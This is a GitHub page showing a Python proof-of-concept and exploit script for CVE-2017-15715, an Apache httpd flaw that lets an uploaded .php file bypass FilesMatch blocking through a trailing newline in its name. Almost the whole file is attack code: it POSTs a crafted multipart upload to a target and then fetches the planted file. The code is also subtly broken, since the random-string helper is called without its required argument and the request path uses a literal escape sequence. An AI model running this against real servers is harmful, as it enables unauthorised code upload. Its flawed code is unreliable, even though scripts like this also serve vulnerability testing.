-
Notifications
You must be signed in to change notification settings - Fork 222
/
CVE-2017-15715.py
89 lines (69 loc) · 2.73 KB
/
CVE-2017-15715.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
import requests
import random
import string
# Vuln Base Info
def info():
return {
"author": "cckuailong",
"name": '''Apache Arbitrary File Upload''',
"description": '''In Apache httpd 2.4.0 to 2.4.29, the expression specified in <FilesMatch> could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are externally blocked, but only by matching the trailing portion of the filename.''',
"severity": "high",
"references": [
"https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715"
],
"classification": {
"cvss-metrics": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss-score": "",
"cve-id": "CVE-2017-15715",
"cwe-id": "CWE-20"
},
"metadata":{
"vuln-target": "",
},
"tags": ["cve", "cve2017", "apache", "httpd", "fileupload"],
}
# Vender Fingerprint
def fingerprint(url):
return True
# Proof of Concept
def poc(url):
result = {}
randstr = gen_randstr()
randstr_1 = gen_randstr()
try:
url = format_url(url)
path = """/"""
method = "POST"
data = """------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="file"; filename="{randstr}.php"
{randstr_1}
------WebKitFormBoundaryKc8fBVDo558U4hbJ
Content-Disposition: form-data; name="name"
{randstr}.php\x0A
------WebKitFormBoundaryKc8fBVDo558U4hbJ--""".format(randstr=randstr, randstr_1=randstr_1)
headers = {'Content-Type': 'multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ'}
resp0 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
path = """/{randstr}.php\\x0A""".format(randstr=randstr)
method = "GET"
data = """"""
headers = {'Accept-Encoding': 'gzip,deflate', 'Accept': '*/*'}
resp1 = requests.request(method=method,url=url+path,data=data,headers=headers,timeout=10,verify=False,allow_redirects=False)
if randstr_1 in resp1.text:
result["success"] = True
result["info"] = info()
result["payload"] = url+path
except:
result["success"] = False
return result
# Exploit, can be same with poc()
def exp(url):
return poc(url)
# Utils
def format_url(url):
url = url.strip()
if not ( url.startswith('http://') or url.startswith('https://') ):
url = 'http://' + url
url = url.rstrip('/')
return url
def gen_randstr(length):
return ''.join(random.sample(string.ascii_letters + string.digits, length))